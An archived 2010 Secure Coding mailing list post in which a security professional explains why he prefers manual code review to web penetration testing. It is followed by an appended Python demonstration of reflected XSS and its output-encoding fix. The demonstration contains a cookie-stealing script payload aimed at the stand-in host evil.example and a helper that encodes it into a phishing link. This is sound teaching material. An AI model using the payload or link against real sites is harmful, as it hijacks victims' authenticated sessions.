Secure Coding mailing list archives

What do you like better Web penetration testing or static code analysis?


From: kevin.w.wall at gmail.com (Kevin W. Wall)
Date: Sun, 18 Apr 2010 19:24:24 -0400

Matt Parsons wrote:
What do you like doing better as application security professionals, web
penetration testing or static code analysis?

McGovern, James F. (P+C Technology) wrote:
Should a security professional have a preference when both have
different value propositions? While there is overlap, a static analysis
tool can find things that pen testing tools cannot. Likewise, a pen test
can report on secure applications deployed insecurely which is not
visible to static analysis.

So, the best answer is I prefer both...

While I realize that both are necessary and each have their own
pros and cons, my personal preference is to do static code analysis,
especially if it involves old-fashioned manual code inspections.

The reason for that is that I like getting closer to the source code.
Maybe that's just because it seems like I'm getting back to
my development roots. (I worked as a developer for the first half
of my career.) I find the advantage of dealing with source code
is that you are able to spot the exact problem as well as offer
more specific fixes. And working at the source code level gives
me more opportunities to work closely with the development teams
where I am able to explain to them in terms of their own code what
is going on and how a vulnerability can be fixed.

When approaching vulnerabilities from a pen testing level, I find
all too often that the developers do not believe that there is anything
wrong or if they do, they don't believe that it is serious enough that
it needs to be fixed. (For instance, it is not uncommon that when
developers are presented with results from a pen test that show that
they have non-persistent (reflective) XSS vulnerabilities present,
that I get the response "Yeah, but that's not going to happen. First
you would have to get an authenticated user to click on that link and
they would never do that." Apparently they don't believe that those
doing phishing ever catch any victims.) However, when I'm dealing with
source code, that objection generally does not come up...perhaps
because I can show them right then and there how to remediate the
issue.

-kevin
-- 
Kevin W. Wall
"The most likely way for the world to be destroyed, most experts agree,
is by accident. That's where we come in; we're computer professionals.
We cause accidents."        -- Nathaniel Borenstein, co-creator of MIME
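The reflected XSS scenario Kevin describes, as an added example that is not part of the original post or thread: a search page that echoes the "q" parameter unencoded, the link a phishing mail would carry (the victim only has to click it), and the same page with HTML output encoding applied. The URL, parameter name and payload are made up for illustration.

```python
# Added example, not code from the mailing list post. The application URL,
# the "q" parameter, and the payload below are constructed for illustration.
from html import escape
from urllib.parse import urlencode

# Constructed attacker payload: closes the attribute it lands in, then adds
# a script that ships the victim's cookie to a host the attacker controls.
PAYLOAD = '"><script>location="https://evil.example/?c="+document.cookie</script>'


def render_search_vulnerable(q: str) -> str:
    """Reflects the query verbatim into the page body and into an attribute.

    This is the bug: whatever arrives in ?q= becomes part of the HTML.
    """
    return (
        "<html><body>"
        f"<h1>Results for {q}</h1>"
        f'<input name="q" value="{q}">'
        "</body></html>"
    )


def render_search_fixed(q: str) -> str:
    """Same page with output encoding.

    html.escape(quote=True) encodes & < > " and ', which is sufficient for
    element content and for quoted attribute values (it is not sufficient
    for unquoted attributes, JavaScript, or URL contexts).
    """
    safe = escape(q, quote=True)
    return (
        "<html><body>"
        f"<h1>Results for {safe}</h1>"
        f'<input name="q" value="{safe}">'
        "</body></html>"
    )


def phishing_link(base_url: str, q: str) -> str:
    """The link a phishing mail would carry.

    urlencode percent-encodes the payload, so the link looks like any other
    search URL on the legitimate site; the browser decodes it server-side.
    """
    return f"{base_url}?{urlencode({'q': q})}"


def reflects_script(page: str) -> bool:
    """Crude check a tester would script: did a raw <script> tag survive?"""
    return "<script>" in page


if __name__ == "__main__":
    link = phishing_link("https://app.example/search", PAYLOAD)
    print("link sent to the victim:", link)
    print("vulnerable page reflects script:", reflects_script(render_search_vulnerable(PAYLOAD)))
    print("fixed page reflects script:", reflects_script(render_search_fixed(PAYLOAD)))
```

Running it shows the vulnerable page containing `value=""><script>...`, i.e. the attribute is closed and the script executes in the authenticated user's session, while the fixed page carries `&lt;script&gt;` as inert text. The point for the "nobody would click that" objection is the first line of output: the link is on the real site's domain and differs from a normal search link only by a percent-encoded query string.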

